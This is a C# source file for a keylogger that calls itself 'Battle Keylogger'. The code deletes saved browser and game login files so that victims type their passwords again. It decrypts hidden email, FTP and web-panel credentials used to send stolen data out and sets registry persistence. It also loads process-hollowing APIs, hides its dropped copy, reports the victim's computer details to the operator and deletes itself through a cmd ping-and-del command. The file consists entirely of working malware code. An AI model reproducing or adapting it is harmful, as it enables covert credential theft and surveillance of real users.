public static void DeleteSavedPasswords()
{
try
{
File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\.minecraft\lastlogin");
}
catch (Exception ex) { Config.DumpErrorLog(ex, null); }
try
{
string chromePath = StringCipher.Decrypt("[CHROMEPATH]", Config.MUTEX);
File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + chromePath + "Login Data");
File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + chromePath + "Web Data");
}
catch (Exception ex) { Config.DumpErrorLog(ex, null); }
try
{
foreach (string folder in Directory.GetDirectories(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\Application Data\Mozilla\Firefox\Profiles\"))
{
if (folder.Contains(".default"))
{
File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\" + folder + @"\Login Data");
File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\" + folder + @"\signons.txt");
File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\" + folder + @"\signons2.txt");
File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\" + folder + @"\signons3.txt");
File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\" + folder + @"signons.sqlite");
File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\" + folder + @"\key3.db");
}
}
}
catch (Exception ex) { Config.DumpErrorLog(ex, null); }
}
public static void Decrypt()
{
Config.EMAIL_USERNAME = StringCipher.Decrypt(Config.EMAIL_USERNAME, Config.MUTEX);
Config.EMAIL_PASSWORD = StringCipher.Decrypt(Config.EMAIL_PASSWORD, Config.MUTEX);
Config.EMAIL_PORT = StringCipher.Decrypt(Config.EMAIL_PORT, Config.MUTEX);
Config.EMAIL_SERVER = StringCipher.Decrypt(Config.EMAIL_SERVER, Config.MUTEX);
Config.FTP_USERNAME = StringCipher.Decrypt(Config.FTP_USERNAME, Config.MUTEX);
Config.FTP_PASSWORD = StringCipher.Decrypt(Config.FTP_PASSWORD, Config.MUTEX);
Config.FTP_SERVER = StringCipher.Decrypt(Config.FTP_SERVER, Config.MUTEX);
if (!Uri.IsWellFormedUriString(Config.FTP_SERVER, UriKind.Absolute))
{
if (Uri.IsWellFormedUriString("ftp://" + Config.FTP_SERVER, UriKind.Absolute))
{
Config.FTP_SERVER = "ftp://" + Config.FTP_SERVER;
}
}
Config.PHP_KEY = StringCipher.Decrypt(Config.PHP_KEY, Config.MUTEX);
Config.WEBPANEL = StringCipher.Decrypt(Config.WEBPANEL, Config.MUTEX);
Config.GUID = "{windows-[" + Config.HWID + "]}";
}
private static void Startup(object args)
{
string installPath = args.ToString();
do
{
try
{
if (!string.IsNullOrEmpty(Config.HKCU))
{
Registry.CurrentUser.OpenSubKey(StringCipher.Decrypt("[REGISTRYPATH]", Config.MUTEX), true).SetValue(Config.HKCU, installPath);
}
}
catch { }
try
{
if (!string.IsNullOrEmpty(Config.HKLM))
{
Registry.LocalMachine.OpenSubKey(StringCipher.Decrypt("[REGISTRYPATH]", Config.MUTEX), true).SetValue(Config.HKLM, installPath);
}
}
catch { }
}while (!string.IsNullOrEmpty(Config.REGISTRY_PERSISTENCE));
}
public static void Initialize()
{
//DynamicCreateProcess = Core.CreateAPI<CreateProcess>(Core.KERNEL32, StringCipher.Decrypt("[CreateProcessW]", Config.MUTEX));
DynamicGetThreadContext = Core.CreateAPI <GetThreadContext>(Core.KERNEL32, StringCipher.Decrypt("[GetThreadContext]", Config.MUTEX));
DynamicNtUnmapViewOfSection = Core.CreateAPI <NtUnmapViewOfSection>("ntdll", StringCipher.Decrypt("[NtUnmapViewOfSection]", Config.MUTEX));
DynamicReadProcessMemory = Core.CreateAPI <ReadProcessMemory>(Core.KERNEL32, StringCipher.Decrypt("[ReadProcessMemory]", Config.MUTEX));
DynamicResumeThread = Core.CreateAPI <ResumeThread>(Core.KERNEL32, StringCipher.Decrypt("[ResumeThread]", Config.MUTEX));
DynamicSetThreadContext = Core.CreateAPI <SetThreadContext>(Core.KERNEL32, StringCipher.Decrypt("[SetThreadContext]", Config.MUTEX));
DynamicVirtualAllocEx = Core.CreateAPI <VirtualAllocEx>(Core.KERNEL32, StringCipher.Decrypt("[VirtualAllocEx]", Config.MUTEX));
DynamicWow64GetThreadContext = Core.CreateAPI <Wow64GetThreadContext>(Core.KERNEL32, StringCipher.Decrypt("[Wow64GetThreadContext]", Config.MUTEX));
DynamicWow64SetThreadContext = Core.CreateAPI <Wow64SetThreadContext>(Core.KERNEL32, StringCipher.Decrypt("[Wow64SetThreadContext]", Config.MUTEX));
DynamicWriteProcessMemory = Core.CreateAPI <WriteProcessMemory>(Core.KERNEL32, StringCipher.Decrypt("[WriteProcessMemory]", Config.MUTEX));
}
public static void Install()
{
try
{
string runningPath = Application.ExecutablePath;
if (runningPath.Equals(GetInstallPath()))
{
return;
}
string installPath = string.Empty;
if (Config.PATH_TYPE.Equals("1"))
{
installPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
}
else if (Config.PATH_TYPE.Equals("2"))
{
installPath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData);
}
else if (Config.PATH_TYPE.Equals("3"))
{
installPath = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments);
}
else if (Config.PATH_TYPE.Equals("4"))
{
installPath = Path.GetTempPath().Substring(0, Path.GetTempPath().Length - 1);
}
installPath += "\\" + Config.FOLDER_NAME;
if (!Directory.Exists(installPath))
{
try
{
Directory.CreateDirectory(installPath);
}
catch { }
}
installPath += "\\" + Config.FILE_NAME;
try
{
File.Copy(runningPath, installPath, true); //Drops file
}
catch { }
try
{
Core.CallAPI <bool>("kernel32", "DeleteFile", new Type[] { typeof(string) }, installPath + StringCipher.Decrypt("[ZONEID]", Config.MUTEX));
}
catch { }
Core.Upload("Battle Keylogger Installation Notification", "Battle Keylogger has been installed with the Galaxy Logger Installation Module" + Environment.NewLine + ComputerInformation.GetInformation(), "4");
if (!string.IsNullOrEmpty(Config.HIDE_FILE))
{
try
{
File.SetAttributes(installPath, FileAttributes.Hidden);
File.SetAttributes(installPath, FileAttributes.System);
}
catch { }
}
if (!string.IsNullOrEmpty(Config.MELT_FILE))
{
try
{
ProcessStartInfo info = new ProcessStartInfo();
info.CreateNoWindow = true;
info.UseShellExecute = false;
info.FileName = "cmd";
info.Arguments = "/c ping -n 3 127.0.0.1 > nul & del " + '"' + runningPath + '"';
Process.Start(info);
}
catch { }
}
Process.Start(installPath);
//GC.Collect();
Environment.Exit(0);
}
catch (Exception ex) { Config.DumpErrorLog(ex, null); }
}